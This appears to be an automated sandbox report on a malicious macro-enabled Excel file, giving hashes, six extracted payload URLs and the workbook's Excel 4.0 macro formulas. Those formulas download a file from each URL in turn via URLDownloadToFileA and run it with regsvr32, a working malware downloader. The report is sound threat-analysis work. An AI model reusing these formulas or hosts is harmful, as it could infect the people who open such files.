Behavioral task
behavioral1
Sample
e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7.xlsm
Resource
win10v2004-20241007-en
General
-
Target
e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7
-
Size
40KB
-
MD5
8554766a2935ba1537f9c6abf54e8125
-
SHA1
e26e44a2a22255fdb909440e514485eec29a0841
-
SHA256
e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7
-
SHA512
931f1b491811ed6ff130664abea6572427031be6aaaa9951fb19733f9574ced28cbc5a09e402ef1267af2e7a93ace747c1abbbb01e5fa3d0d3167513db41e2ad
-
SSDEEP
768:0PnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:qnC5iymTylND59V4jwmXc2XFy
Malware Config
Extracted
http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/
http://totalplaytuxtla.com/sitio/tEMOwWRh/
http://meca-global.com/wp-admin/zpM6L8KXY0H/
http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/
http://51.222.72.232/wp-includes/3ztqctcYr/
http://51.222.72.233/wp-includes/Xi60QX9khe/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()
Signatures
Files
-
e973601e88e5086fb02ec081bcdc4c660b006e277cfb2d3d38fe249fff6b51a7.xlsm office2007